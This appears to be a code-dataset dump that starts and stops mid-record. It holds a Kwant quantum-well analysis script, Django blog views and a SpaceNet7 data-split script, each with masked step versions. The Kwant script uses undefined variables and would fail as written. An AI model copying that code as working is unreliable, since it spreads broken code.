"step-5": "#!/usr/bin/env python\n'''\nScript for analysis of wavefunctions on GaSb/InAs/GaSb simmetric quantum wells.\n\nThis piece code is part of the project \"phd_gasb_inas\", which comprises the work\nrelated to the Phd. Dissertation named: \"Quantum transport of charge and spin in\ntopological insulators 2D\".\n\nAuthor: Marcos Medeiros\nemail: [email protected]\n'''\n\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\n\n# Kwant related stuff\nimport kwant\nimport tinyarray\n\n# local application imports\nfrom hamiltonians import gasb_hamiltonian as gasb\nfrom system_geometry import shapes\nfrom transport_tools import bands_and_currents as tools\n\n\ndef map_density(ax, syst, psi_sqrd, colormap = \"Reds\"):\n # Plot the results:\n # print(max(psi_sqrd))\n kwant.plotter.map(syst, psi_sqrd, ax = ax, fig_size = (7,3), cmap = colormap, vmax = 0.99*max(psi_sqrd))\n tools.edit_axis(ax,'dens')\n return 0\n\ndef density_in_line(syst, states, Op = np.eye(6)):\n y_stack = []\n def line(site):\n (x, y) = site.pos\n half = 0\n delta = shapes.A_STD\n ans = abs(x - half) < delta\n if ans == True : y_stack.append(y)\n return ans\n\n rho_line = kwant.operator.Density(syst, Op, where = line, sum = False)\n dos_line = np.array([rho_line(p) for p in states])\n return dos_line, np.array(y_stack)\n\ndef plot_dos_in_line(dos_line):\n fig, ax = plt.subplots(1, 2, figsize = (10,5))\n ax[0].plot(dos_line[0], color = 'red')\n ax[1].plot(dos_line[1], color = 'blue')\n plt.tight_layout()\n plt.show()\n\ndef normalize(dos_in_line):\n # return sum(dos_in_line)\n return sum(dos_in_line)/max(sum(dos_in_line))\n\ndef print_info_dos_line(y_values, dos_in_line):\n print(80*\"=\")\n print(\"Size of dos_both: \", dos_in_line.shape)\n print(\"Size of y_both: \", y_values.shape)\n print(\"y_both:\\n\", y_values)\n\n\n\ndef main():\n # Define the system:\n hamiltonian = gasb.hamiltonian_97_k_plus()\n # hamiltonian = gasb.hamiltonian_97_down()\n lead_ham = gasb.free_ham(6)\n centralShape = shapes.Rect()\n syst = gasb.system_builder(hamiltonian, lead_ham, centralShape)\n\n\n # Calculate the wave_function:\n energia = 448\n parametros = gasb.params_97\n parametros['Eta3'] = 0\n parametros['Eta2'] = 0\n parametros['eF'] = 60\n parametros = dict(GammaLead = parametros[\"GammaC\"], V = 100, **parametros )\n wf = kwant.wave_function(syst, energy = energia, params = parametros)\n modes_left = wf(0)\n modes_right = wf(1)\n # modes_total = np.vstack((wf(0), wf(1)))\n\n\n # Calculate the density:\n sigma_z = tinyarray.array([[1,0],[0,-1]])\n spin_proj= np.kron(sigma_z, np.eye(3))\n identity = np.eye(6)\n rho = kwant.operator.Density(syst, spin_proj)\n psi_left = sum(rho(p) for p in modes_left)\n psi_right = sum(rho(p) for p in modes_right)\n\n\n # Calculate dos in a line\n dos_in_line_from_left = density_in_line(syst, psi)\n dos_in_line_from_both = density_in_line(syst, np.vstack((wf(0),wf(1))))\n plt.plot(sum(dos_in_line_from_both))\n plt.show()\n # print(dos_in_line.shape)\n # print(dos_in_line)\n plot_dos_in_line(dos_in_line_from_left)\n # plot_dos_in_line(dos_in_line_from_both)\n print(sum(dos_in_line_from_both).shape)\n\n\n # Plot the results:\n colorRight = \"seismic\"\n colorLeft = \"seismic\"\n fig, ax = plt.subplots(2,2,figsize=(14,6))\n y_values_left = y_values_left * (shapes.A0 / 10) # conversion to nm^{-1}\n y_values_right = y_values_right * (shapes.A0 / 10) # conversion to nm^{-1}\n min_line, max_line = -0.7 * shapes.L_STD, 0.7 * shapes.L_STD\n\n map_density(ax[0][0], syst, psi_left, colormap = colorRight)\n ax[0][0].vlines(0, min_line, max_line, linestyle = \"--\")\n ax[0][0].set_title(\"left lead\")\n map_density(ax[1][0], syst, psi_right, colormap = colorLeft)\n ax[1][0].vlines(0, min_line, max_line, linestyle = \"--\")\n ax[1][0].set_title(\"right lead\")\n\n ax[0][1].plot(y_values_left, normalize(dos_in_line_from_left),\n marker = \".\", markersize = 2.5, linestyle = \"-\" )\n ax[1][1].plot(y_values_right, normalize(dos_in_line_from_right),\n marker = \".\", markersize = 2.5, linestyle = \"-\" )\n plt.tight_layout()\n plt.show()\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
4,
5,
7,
8,
9
]
}
|
[
4,
5,
7,
8,
9
] |
from django.shortcuts import render, get_object_or_404
from django.core.paginator import Paginator
from .models import Blog, BlogType
from django.conf import settings
from read_statistics.utils import read_statistics_once_read
from user.forms import LoginForm
# Create your views here.
#分页函数
def get_blogs_common_data(request, blogs_all_list):
# 分页器
page_num = request.GET.get('page', 1)
paginator = Paginator(blogs_all_list, settings.BLOGS_PER_PAGE)
page_of_blogs = paginator.get_page(page_num)
current_page_num = page_of_blogs.number
page_range = list(range(max(1, current_page_num - 2), min(paginator.num_pages + 1, current_page_num + 3)))
if page_range[0] != 1:
page_range.insert(0, 1)
if page_range[1] - page_range[0] >= 2:
page_range.insert(1, '...')
if page_range[-1] != paginator.num_pages:
page_range.append(paginator.num_pages)
if page_range[-1] - page_range[-2] >= 2:
page_range.insert(-1, '...')
# 获取日期归档的博客统计数量
blog_dates = dict()
all_dates = Blog.objects.dates('created_time', 'month', order='DESC')
for blogs_date in all_dates:
blogs_count = Blog.objects.filter(created_time__year=blogs_date.year,
created_time__month=blogs_date.month).count()
blog_dates[blogs_date] = blogs_count
# 获取公共的数据
context = dict()
context['blogs'] = page_of_blogs
context['page_range'] = page_range
# 运用annotate方法给对象添加注释
#context['blog_types'] = BlogType.objects.annotate(blog_count=Count('blog'))
context['blog_types'] = BlogType.objects.all()
context['blog_dates'] = blog_dates
return context
def blog_list(request):
blogs_all_list = Blog.objects.all()
context = get_blogs_common_data(request, blogs_all_list)
return render(request, 'blog/blog_list.html', context)
def blogs_with_type(request, blog_type_pk):
blog_type = get_object_or_404(BlogType, pk=blog_type_pk)
blogs_all_list = Blog.objects.filter(blog_type=blog_type)
context = get_blogs_common_data(request, blogs_all_list)
context['blog_type'] = blog_type
return render(request, 'blog/blogs_with_type.html', context)
def blogs_with_date(request, year, month):
blogs_all_list = Blog.objects.filter(created_time__year=year, created_time__month=month)
context = get_blogs_common_data(request, blogs_all_list)
context['blogs_with_date'] = '%s年%s' % (year, month)
return render(request, 'blog/blogs_with_date.html', context)
def blog_detail(request, blog_pk):
blog = get_object_or_404(Blog, pk=blog_pk)
read_cookie_key = read_statistics_once_read(request, blog)
context = dict()
context['blog'] = blog
context['blog_author'] = blog.author.get_nickname_or_username()
context['login_form'] = LoginForm()
context['pre_blog'] = Blog.objects.filter(created_time__gt=blog.created_time).last()
context['next_blog'] = Blog.objects.filter(created_time__lt=blog.created_time).first()
context['blog_dates'] = Blog.objects.dates('created_time', 'month', order='DESC')
response = render(request, 'blog/blog_detail.html', context)
response.set_cookie(read_cookie_key, 'true')
return response
|
normal
|
{
"blob_id": "9731f45b19d40a031216f8a430c09764fd34e984",
"index": 2594,
"step-1": "<mask token>\n\n\ndef get_blogs_common_data(request, blogs_all_list):\n page_num = request.GET.get('page', 1)\n paginator = Paginator(blogs_all_list, settings.BLOGS_PER_PAGE)\n page_of_blogs = paginator.get_page(page_num)\n current_page_num = page_of_blogs.number\n page_range = list(range(max(1, current_page_num - 2), min(paginator.\n num_pages + 1, current_page_num + 3)))\n if page_range[0] != 1:\n page_range.insert(0, 1)\n if page_range[1] - page_range[0] >= 2:\n page_range.insert(1, '...')\n if page_range[-1] != paginator.num_pages:\n page_range.append(paginator.num_pages)\n if page_range[-1] - page_range[-2] >= 2:\n page_range.insert(-1, '...')\n blog_dates = dict()\n all_dates = Blog.objects.dates('created_time', 'month', order='DESC')\n for blogs_date in all_dates:\n blogs_count = Blog.objects.filter(created_time__year=blogs_date.\n year, created_time__month=blogs_date.month).count()\n blog_dates[blogs_date] = blogs_count\n context = dict()\n context['blogs'] = page_of_blogs\n context['page_range'] = page_range\n context['blog_types'] = BlogType.objects.all()\n context['blog_dates'] = blog_dates\n return context\n\n\ndef blog_list(request):\n blogs_all_list = Blog.objects.all()\n context = get_blogs_common_data(request, blogs_all_list)\n return render(request, 'blog/blog_list.html', context)\n\n\n<mask token>\n\n\ndef blog_detail(request, blog_pk):\n blog = get_object_or_404(Blog, pk=blog_pk)\n read_cookie_key = read_statistics_once_read(request, blog)\n context = dict()\n context['blog'] = blog\n context['blog_author'] = blog.author.get_nickname_or_username()\n context['login_form'] = LoginForm()\n context['pre_blog'] = Blog.objects.filter(created_time__gt=blog.\n created_time).last()\n context['next_blog'] = Blog.objects.filter(created_time__lt=blog.\n created_time).first()\n context['blog_dates'] = Blog.objects.dates('created_time', 'month',\n order='DESC')\n response = render(request, 'blog/blog_detail.html', context)\n response.set_cookie(read_cookie_key, 'true')\n return response\n",
"step-2": "<mask token>\n\n\ndef get_blogs_common_data(request, blogs_all_list):\n page_num = request.GET.get('page', 1)\n paginator = Paginator(blogs_all_list, settings.BLOGS_PER_PAGE)\n page_of_blogs = paginator.get_page(page_num)\n current_page_num = page_of_blogs.number\n page_range = list(range(max(1, current_page_num - 2), min(paginator.\n num_pages + 1, current_page_num + 3)))\n if page_range[0] != 1:\n page_range.insert(0, 1)\n if page_range[1] - page_range[0] >= 2:\n page_range.insert(1, '...')\n if page_range[-1] != paginator.num_pages:\n page_range.append(paginator.num_pages)\n if page_range[-1] - page_range[-2] >= 2:\n page_range.insert(-1, '...')\n blog_dates = dict()\n all_dates = Blog.objects.dates('created_time', 'month', order='DESC')\n for blogs_date in all_dates:\n blogs_count = Blog.objects.filter(created_time__year=blogs_date.\n year, created_time__month=blogs_date.month).count()\n blog_dates[blogs_date] = blogs_count\n context = dict()\n context['blogs'] = page_of_blogs\n context['page_range'] = page_range\n context['blog_types'] = BlogType.objects.all()\n context['blog_dates'] = blog_dates\n return context\n\n\ndef blog_list(request):\n blogs_all_list = Blog.objects.all()\n context = get_blogs_common_data(request, blogs_all_list)\n return render(request, 'blog/blog_list.html', context)\n\n\ndef blogs_with_type(request, blog_type_pk):\n blog_type = get_object_or_404(BlogType, pk=blog_type_pk)\n blogs_all_list = Blog.objects.filter(blog_type=blog_type)\n context = get_blogs_common_data(request, blogs_all_list)\n context['blog_type'] = blog_type\n return render(request, 'blog/blogs_with_type.html', context)\n\n\n<mask token>\n\n\ndef blog_detail(request, blog_pk):\n blog = get_object_or_404(Blog, pk=blog_pk)\n read_cookie_key = read_statistics_once_read(request, blog)\n context = dict()\n context['blog'] = blog\n context['blog_author'] = blog.author.get_nickname_or_username()\n context['login_form'] = LoginForm()\n context['pre_blog'] = Blog.objects.filter(created_time__gt=blog.\n created_time).last()\n context['next_blog'] = Blog.objects.filter(created_time__lt=blog.\n created_time).first()\n context['blog_dates'] = Blog.objects.dates('created_time', 'month',\n order='DESC')\n response = render(request, 'blog/blog_detail.html', context)\n response.set_cookie(read_cookie_key, 'true')\n return response\n",
"step-3": "<mask token>\n\n\ndef get_blogs_common_data(request, blogs_all_list):\n page_num = request.GET.get('page', 1)\n paginator = Paginator(blogs_all_list, settings.BLOGS_PER_PAGE)\n page_of_blogs = paginator.get_page(page_num)\n current_page_num = page_of_blogs.number\n page_range = list(range(max(1, current_page_num - 2), min(paginator.\n num_pages + 1, current_page_num + 3)))\n if page_range[0] != 1:\n page_range.insert(0, 1)\n if page_range[1] - page_range[0] >= 2:\n page_range.insert(1, '...')\n if page_range[-1] != paginator.num_pages:\n page_range.append(paginator.num_pages)\n if page_range[-1] - page_range[-2] >= 2:\n page_range.insert(-1, '...')\n blog_dates = dict()\n all_dates = Blog.objects.dates('created_time', 'month', order='DESC')\n for blogs_date in all_dates:\n blogs_count = Blog.objects.filter(created_time__year=blogs_date.\n year, created_time__month=blogs_date.month).count()\n blog_dates[blogs_date] = blogs_count\n context = dict()\n context['blogs'] = page_of_blogs\n context['page_range'] = page_range\n context['blog_types'] = BlogType.objects.all()\n context['blog_dates'] = blog_dates\n return context\n\n\ndef blog_list(request):\n blogs_all_list = Blog.objects.all()\n context = get_blogs_common_data(request, blogs_all_list)\n return render(request, 'blog/blog_list.html', context)\n\n\ndef blogs_with_type(request, blog_type_pk):\n blog_type = get_object_or_404(BlogType, pk=blog_type_pk)\n blogs_all_list = Blog.objects.filter(blog_type=blog_type)\n context = get_blogs_common_data(request, blogs_all_list)\n context['blog_type'] = blog_type\n return render(request, 'blog/blogs_with_type.html', context)\n\n\ndef blogs_with_date(request, year, month):\n blogs_all_list = Blog.objects.filter(created_time__year=year,\n created_time__month=month)\n context = get_blogs_common_data(request, blogs_all_list)\n context['blogs_with_date'] = '%s年%s' % (year, month)\n return render(request, 'blog/blogs_with_date.html', context)\n\n\ndef blog_detail(request, blog_pk):\n blog = get_object_or_404(Blog, pk=blog_pk)\n read_cookie_key = read_statistics_once_read(request, blog)\n context = dict()\n context['blog'] = blog\n context['blog_author'] = blog.author.get_nickname_or_username()\n context['login_form'] = LoginForm()\n context['pre_blog'] = Blog.objects.filter(created_time__gt=blog.\n created_time).last()\n context['next_blog'] = Blog.objects.filter(created_time__lt=blog.\n created_time).first()\n context['blog_dates'] = Blog.objects.dates('created_time', 'month',\n order='DESC')\n response = render(request, 'blog/blog_detail.html', context)\n response.set_cookie(read_cookie_key, 'true')\n return response\n",
"step-4": "from django.shortcuts import render, get_object_or_404\nfrom django.core.paginator import Paginator\nfrom .models import Blog, BlogType\nfrom django.conf import settings\nfrom read_statistics.utils import read_statistics_once_read\nfrom user.forms import LoginForm\n\n\ndef get_blogs_common_data(request, blogs_all_list):\n page_num = request.GET.get('page', 1)\n paginator = Paginator(blogs_all_list, settings.BLOGS_PER_PAGE)\n page_of_blogs = paginator.get_page(page_num)\n current_page_num = page_of_blogs.number\n page_range = list(range(max(1, current_page_num - 2), min(paginator.\n num_pages + 1, current_page_num + 3)))\n if page_range[0] != 1:\n page_range.insert(0, 1)\n if page_range[1] - page_range[0] >= 2:\n page_range.insert(1, '...')\n if page_range[-1] != paginator.num_pages:\n page_range.append(paginator.num_pages)\n if page_range[-1] - page_range[-2] >= 2:\n page_range.insert(-1, '...')\n blog_dates = dict()\n all_dates = Blog.objects.dates('created_time', 'month', order='DESC')\n for blogs_date in all_dates:\n blogs_count = Blog.objects.filter(created_time__year=blogs_date.\n year, created_time__month=blogs_date.month).count()\n blog_dates[blogs_date] = blogs_count\n context = dict()\n context['blogs'] = page_of_blogs\n context['page_range'] = page_range\n context['blog_types'] = BlogType.objects.all()\n context['blog_dates'] = blog_dates\n return context\n\n\ndef blog_list(request):\n blogs_all_list = Blog.objects.all()\n context = get_blogs_common_data(request, blogs_all_list)\n return render(request, 'blog/blog_list.html', context)\n\n\ndef blogs_with_type(request, blog_type_pk):\n blog_type = get_object_or_404(BlogType, pk=blog_type_pk)\n blogs_all_list = Blog.objects.filter(blog_type=blog_type)\n context = get_blogs_common_data(request, blogs_all_list)\n context['blog_type'] = blog_type\n return render(request, 'blog/blogs_with_type.html', context)\n\n\ndef blogs_with_date(request, year, month):\n blogs_all_list = Blog.objects.filter(created_time__year=year,\n created_time__month=month)\n context = get_blogs_common_data(request, blogs_all_list)\n context['blogs_with_date'] = '%s年%s' % (year, month)\n return render(request, 'blog/blogs_with_date.html', context)\n\n\ndef blog_detail(request, blog_pk):\n blog = get_object_or_404(Blog, pk=blog_pk)\n read_cookie_key = read_statistics_once_read(request, blog)\n context = dict()\n context['blog'] = blog\n context['blog_author'] = blog.author.get_nickname_or_username()\n context['login_form'] = LoginForm()\n context['pre_blog'] = Blog.objects.filter(created_time__gt=blog.\n created_time).last()\n context['next_blog'] = Blog.objects.filter(created_time__lt=blog.\n created_time).first()\n context['blog_dates'] = Blog.objects.dates('created_time', 'month',\n order='DESC')\n response = render(request, 'blog/blog_detail.html', context)\n response.set_cookie(read_cookie_key, 'true')\n return response\n",
"step-5": "from django.shortcuts import render, get_object_or_404\nfrom django.core.paginator import Paginator\nfrom .models import Blog, BlogType\nfrom django.conf import settings\nfrom read_statistics.utils import read_statistics_once_read\nfrom user.forms import LoginForm\n\n# Create your views here.\n#分页函数\ndef get_blogs_common_data(request, blogs_all_list):\n # 分页器\n page_num = request.GET.get('page', 1)\n paginator = Paginator(blogs_all_list, settings.BLOGS_PER_PAGE)\n page_of_blogs = paginator.get_page(page_num)\n current_page_num = page_of_blogs.number\n page_range = list(range(max(1, current_page_num - 2), min(paginator.num_pages + 1, current_page_num + 3)))\n if page_range[0] != 1:\n page_range.insert(0, 1)\n if page_range[1] - page_range[0] >= 2:\n page_range.insert(1, '...')\n if page_range[-1] != paginator.num_pages:\n page_range.append(paginator.num_pages)\n if page_range[-1] - page_range[-2] >= 2:\n page_range.insert(-1, '...')\n # 获取日期归档的博客统计数量\n blog_dates = dict()\n all_dates = Blog.objects.dates('created_time', 'month', order='DESC')\n for blogs_date in all_dates:\n blogs_count = Blog.objects.filter(created_time__year=blogs_date.year,\n created_time__month=blogs_date.month).count()\n blog_dates[blogs_date] = blogs_count\n\n # 获取公共的数据\n context = dict()\n context['blogs'] = page_of_blogs\n context['page_range'] = page_range\n # 运用annotate方法给对象添加注释\n #context['blog_types'] = BlogType.objects.annotate(blog_count=Count('blog'))\n context['blog_types'] = BlogType.objects.all()\n context['blog_dates'] = blog_dates\n return context\n\ndef blog_list(request):\n blogs_all_list = Blog.objects.all()\n context = get_blogs_common_data(request, blogs_all_list)\n return render(request, 'blog/blog_list.html', context)\n\ndef blogs_with_type(request, blog_type_pk):\n blog_type = get_object_or_404(BlogType, pk=blog_type_pk)\n blogs_all_list = Blog.objects.filter(blog_type=blog_type)\n context = get_blogs_common_data(request, blogs_all_list)\n context['blog_type'] = blog_type\n return render(request, 'blog/blogs_with_type.html', context)\n\ndef blogs_with_date(request, year, month):\n blogs_all_list = Blog.objects.filter(created_time__year=year, created_time__month=month)\n context = get_blogs_common_data(request, blogs_all_list)\n context['blogs_with_date'] = '%s年%s' % (year, month)\n return render(request, 'blog/blogs_with_date.html', context)\n\ndef blog_detail(request, blog_pk):\n blog = get_object_or_404(Blog, pk=blog_pk)\n read_cookie_key = read_statistics_once_read(request, blog)\n context = dict()\n context['blog'] = blog\n context['blog_author'] = blog.author.get_nickname_or_username()\n context['login_form'] = LoginForm()\n context['pre_blog'] = Blog.objects.filter(created_time__gt=blog.created_time).last()\n context['next_blog'] = Blog.objects.filter(created_time__lt=blog.created_time).first()\n context['blog_dates'] = Blog.objects.dates('created_time', 'month', order='DESC')\n response = render(request, 'blog/blog_detail.html', context)\n response.set_cookie(read_cookie_key, 'true')\n return response",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
#!/usr/bin/env python3
import argparse
import json
import os
import random
import timeit
from glob import glob
import numpy as np
def parse_args():
"""[summary]
Returns:
[type]: [description]
"""
parser = argparse.ArgumentParser()
parser.add_argument('--train_dir',
help='directory containing spacenet7 train dataset',
default='/data/spacenet7/spacenet7/train/')
parser.add_argument('--mask_dir',
help='directory containing building mask image files',
default='/data/spacenet7/building_masks/')
parser.add_argument('--out_dir',
help='output root directory',
default='/data/spacenet7/split/')
parser.add_argument('--split_num',
help='number of split',
type=int,
default=5)
return parser.parse_args()
def dump_file_paths(aois, output_path, train_dir, mask_dir):
"""[summary]
Args:
aois ([type]): [description]
output_path ([type]): [description]
train_dir ([type]): [description]
mask_dir ([type]): [description]
"""
results = []
for aoi in aois:
image_paths = glob(
os.path.join(train_dir, aoi, 'images_masked', '*.tif'))
image_paths.sort()
N = len(image_paths)
for i in range(N):
# get path to mask
image_path = image_paths[i]
filename = os.path.basename(image_path)
mask_path = os.path.join(mask_dir, aoi, filename)
assert os.path.exists(mask_path)
# previous frame
image_prev_path = image_paths[0] if i == 0 \
else image_paths[i - 1]
# next frame
image_next_path = image_paths[N - 1] if i == N - 1 \
else image_paths[i + 1]
result = {}
result['image_masked'] = image_path
result['building_mask'] = mask_path
result['image_masked_prev'] = image_prev_path
result['image_masked_next'] = image_next_path
results.append(result)
with open(output_path, 'w') as f:
json.dump(results,
f,
ensure_ascii=False,
indent=4,
sort_keys=False,
separators=(',', ': '))
if __name__ == '__main__':
t0 = timeit.default_timer()
args = parse_args()
os.makedirs(args.out_dir)
aois = sorted([
d for d in os.listdir(args.train_dir)
if os.path.isdir(os.path.join(args.train_dir, d))
])
random.seed(777)
random.shuffle(aois)
# split aois into train and val
n = args.split_num
aois_divided = np.array([aois[i::n] for i in range(n)])
for val_idx in range(n):
# dump file paths for val split
val_aois = aois_divided[val_idx]
dump_file_paths(val_aois,
os.path.join(args.out_dir, f'val_{val_idx}.json'),
args.train_dir, args.mask_dir)
# dump file paths for train split
train_mask = np.ones(n, dtype=bool)
train_mask[val_idx] = False
train_aois = aois_divided[train_mask]
train_aois = np.concatenate(train_aois, axis=0).tolist()
dump_file_paths(train_aois,
os.path.join(args.out_dir, f'train_{val_idx}.json'),
args.train_dir, args.mask_dir)
elapsed = timeit.default_timer() - t0
print('Time: {:.3f} min'.format(elapsed / 60.0))
|
normal
|
{
"blob_id": "71eadf5073b5ed13c7d4a58b2aeb52f550a32238",
"index": 3104,
"step-1": "<mask token>\n\n\ndef parse_args():\n \"\"\"[summary]\n\n Returns:\n [type]: [description]\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('--train_dir', help=\n 'directory containing spacenet7 train dataset', default=\n '/data/spacenet7/spacenet7/train/')\n parser.add_argument('--mask_dir', help=\n 'directory containing building mask image files', default=\n '/data/spacenet7/building_masks/')\n parser.add_argument('--out_dir', help='output root directory', default=\n '/data/spacenet7/split/')\n parser.add_argument('--split_num', help='number of split', type=int,\n default=5)\n return parser.parse_args()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef parse_args():\n \"\"\"[summary]\n\n Returns:\n [type]: [description]\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('--train_dir', help=\n 'directory containing spacenet7 train dataset', default=\n '/data/spacenet7/spacenet7/train/')\n parser.add_argument('--mask_dir', help=\n 'directory containing building mask image files', default=\n '/data/spacenet7/building_masks/')\n parser.add_argument('--out_dir', help='output root directory', default=\n '/data/spacenet7/split/')\n parser.add_argument('--split_num', help='number of split', type=int,\n default=5)\n return parser.parse_args()\n\n\ndef dump_file_paths(aois, output_path, train_dir, mask_dir):\n \"\"\"[summary]\n\n Args:\n aois ([type]): [description]\n output_path ([type]): [description]\n train_dir ([type]): [description]\n mask_dir ([type]): [description]\n \"\"\"\n results = []\n for aoi in aois:\n image_paths = glob(os.path.join(train_dir, aoi, 'images_masked',\n '*.tif'))\n image_paths.sort()\n N = len(image_paths)\n for i in range(N):\n image_path = image_paths[i]\n filename = os.path.basename(image_path)\n mask_path = os.path.join(mask_dir, aoi, filename)\n assert os.path.exists(mask_path)\n image_prev_path = image_paths[0] if i == 0 else image_paths[i - 1]\n image_next_path = image_paths[N - 1\n ] if i == N - 1 else image_paths[i + 1]\n result = {}\n result['image_masked'] = image_path\n result['building_mask'] = mask_path\n result['image_masked_prev'] = image_prev_path\n result['image_masked_next'] = image_next_path\n results.append(result)\n with open(output_path, 'w') as f:\n json.dump(results, f, ensure_ascii=False, indent=4, sort_keys=False,\n separators=(',', ': '))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef parse_args():\n \"\"\"[summary]\n\n Returns:\n [type]: [description]\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('--train_dir', help=\n 'directory containing spacenet7 train dataset', default=\n '/data/spacenet7/spacenet7/train/')\n parser.add_argument('--mask_dir', help=\n 'directory containing building mask image files', default=\n '/data/spacenet7/building_masks/')\n parser.add_argument('--out_dir', help='output root directory', default=\n '/data/spacenet7/split/')\n parser.add_argument('--split_num', help='number of split', type=int,\n default=5)\n return parser.parse_args()\n\n\ndef dump_file_paths(aois, output_path, train_dir, mask_dir):\n \"\"\"[summary]\n\n Args:\n aois ([type]): [description]\n output_path ([type]): [description]\n train_dir ([type]): [description]\n mask_dir ([type]): [description]\n \"\"\"\n results = []\n for aoi in aois:\n image_paths = glob(os.path.join(train_dir, aoi, 'images_masked',\n '*.tif'))\n image_paths.sort()\n N = len(image_paths)\n for i in range(N):\n image_path = image_paths[i]\n filename = os.path.basename(image_path)\n mask_path = os.path.join(mask_dir, aoi, filename)\n assert os.path.exists(mask_path)\n image_prev_path = image_paths[0] if i == 0 else image_paths[i - 1]\n image_next_path = image_paths[N - 1\n ] if i == N - 1 else image_paths[i + 1]\n result = {}\n result['image_masked'] = image_path\n result['building_mask'] = mask_path\n result['image_masked_prev'] = image_prev_path\n result['image_masked_next'] = image_next_path\n results.append(result)\n with open(output_path, 'w') as f:\n json.dump(results, f, ensure_ascii=False, indent=4, sort_keys=False,\n separators=(',', ': '))\n\n\nif __name__ == '__main__':\n t0 = timeit.default_timer()\n args = parse_args()\n os.makedirs(args.out_dir)\n aois = sorted([d for d in os.listdir(args.train_dir) if os.path.isdir(\n os.path.join(args.train_dir, d))])\n random.seed(777)\n random.shuffle(aois)\n n = args.split_num\n aois_divided = np.array([aois[i::n] for i in range(n)])\n for val_idx in range(n):\n val_aois = aois_divided[val_idx]\n dump_file_paths(val_aois, os.path.join(args.out_dir,\n f'val_{val_idx}.json'), args.train_dir, args.mask_dir)\n train_mask = np.ones(n, dtype=bool)\n train_mask[val_idx] = False\n train_aois = aois_divided[train_mask]\n train_aois = np.concatenate(train_aois, axis=0).tolist()\n dump_file_paths(train_aois, os.path.join(args.out_dir,\n f'train_{val_idx}.json'), args.train_dir, args.mask_dir)\n elapsed = timeit.default_timer() - t0\n print('Time: {:.3f} min'.format(elapsed / 60.0))\n",
"step-4": "import argparse\nimport json\nimport os\nimport random\nimport timeit\nfrom glob import glob\nimport numpy as np\n\n\ndef parse_args():\n \"\"\"[summary]\n\n Returns:\n [type]: [description]\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('--train_dir', help=\n 'directory containing spacenet7 train dataset', default=\n '/data/spacenet7/spacenet7/train/')\n parser.add_argument('--mask_dir', help=\n 'directory containing building mask image files', default=\n '/data/spacenet7/building_masks/')\n parser.add_argument('--out_dir', help='output root directory', default=\n '/data/spacenet7/split/')\n parser.add_argument('--split_num', help='number of split', type=int,\n default=5)\n return parser.parse_args()\n\n\ndef dump_file_paths(aois, output_path, train_dir, mask_dir):\n \"\"\"[summary]\n\n Args:\n aois ([type]): [description]\n output_path ([type]): [description]\n train_dir ([type]): [description]\n mask_dir ([type]): [description]\n \"\"\"\n results = []\n for aoi in aois:\n image_paths = glob(os.path.join(train_dir, aoi, 'images_masked',\n '*.tif'))\n image_paths.sort()\n N = len(image_paths)\n for i in range(N):\n image_path = image_paths[i]\n filename = os.path.basename(image_path)\n mask_path = os.path.join(mask_dir, aoi, filename)\n assert os.path.exists(mask_path)\n image_prev_path = image_paths[0] if i == 0 else image_paths[i - 1]\n image_next_path = image_paths[N - 1\n ] if i == N - 1 else image_paths[i + 1]\n result = {}\n result['image_masked'] = image_path\n result['building_mask'] = mask_path\n result['image_masked_prev'] = image_prev_path\n result['image_masked_next'] = image_next_path\n results.append(result)\n with open(output_path, 'w') as f:\n json.dump(results, f, ensure_ascii=False, indent=4, sort_keys=False,\n separators=(',', ': '))\n\n\nif __name__ == '__main__':\n t0 = timeit.default_timer()\n args = parse_args()\n os.makedirs(args.out_dir)\n aois = sorted([d for d in os.listdir(args.train_dir) if os.path.isdir(\n os.path.join(args.train_dir, d))])\n random.seed(777)\n random.shuffle(aois)\n n = args.split_num\n aois_divided = np.array([aois[i::n] for i in range(n)])\n for val_idx in range(n):\n val_aois = aois_divided[val_idx]\n dump_file_paths(val_aois, os.path.join(args.out_dir,\n f'val_{val_idx}.json'), args.train_dir, args.mask_dir)\n train_mask = np.ones(n, dtype=bool)\n train_mask[val_idx] = False\n train_aois = aois_divided[train_mask]\n train_aois = np.concatenate(train_aois, axis=0).tolist()\n dump_file_paths(train_aois, os.path.join(args.out_dir,\n f'train_{val_idx}.json'), args.train_dir, args.mask_dir)\n elapsed = timeit.default_timer() - t0\n print('Time: {:.3f} min'.format(elapsed / 60.0))\n",
"step-5": "#!/usr/bin/env python3\n\nimport argparse\nimport json\nimport os\nimport random\nimport timeit\nfrom glob import glob\n\nimport numpy as np\n\n\ndef parse_args():\n \"\"\"[summary]\n\n Returns:\n [type]: [description]\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('--train_dir',\n help='directory containing spacenet7 train dataset',\n default='/data/spacenet7/spacenet7/train/')\n parser.add_argument('--mask_dir',\n help='directory containing building mask image files',\n default='/data/spacenet7/building_masks/')\n parser.add_argument('--out_dir',\n help='output root directory',\n default='/data/spacenet7/split/')\n parser.add_argument('--split_num',\n help='number of split',\n type=int,\n default=5)\n return parser.parse_args()\n\n\ndef dump_file_paths(aois, output_path, train_dir, mask_dir):\n \"\"\"[summary]\n\n Args:\n aois ([type]): [description]\n output_path ([type]): [description]\n train_dir ([type]): [description]\n mask_dir ([type]): [description]\n \"\"\"\n\n results = []\n\n for aoi in aois:\n image_paths = glob(\n os.path.join(train_dir, aoi, 'images_masked', '*.tif'))\n image_paths.sort()\n\n N = len(image_paths)\n for i in range(N):\n # get path to mask\n image_path = image_paths[i]\n filename = os.path.basename(image_path)\n mask_path = os.path.join(mask_dir, aoi, filename)\n assert os.path.exists(mask_path)\n\n # previous frame\n image_prev_path = image_paths[0] if i == 0 \\\n else image_paths[i - 1]\n\n # next frame\n image_next_path = image_paths[N - 1] if i == N - 1 \\\n else image_paths[i + 1]\n\n result = {}\n result['image_masked'] = image_path\n result['building_mask'] = mask_path\n result['image_masked_prev'] = image_prev_path\n result['image_masked_next'] = image_next_path\n results.append(result)\n\n with open(output_path, 'w') as f:\n json.dump(results,\n f,\n ensure_ascii=False,\n indent=4,\n sort_keys=False,\n separators=(',', ': 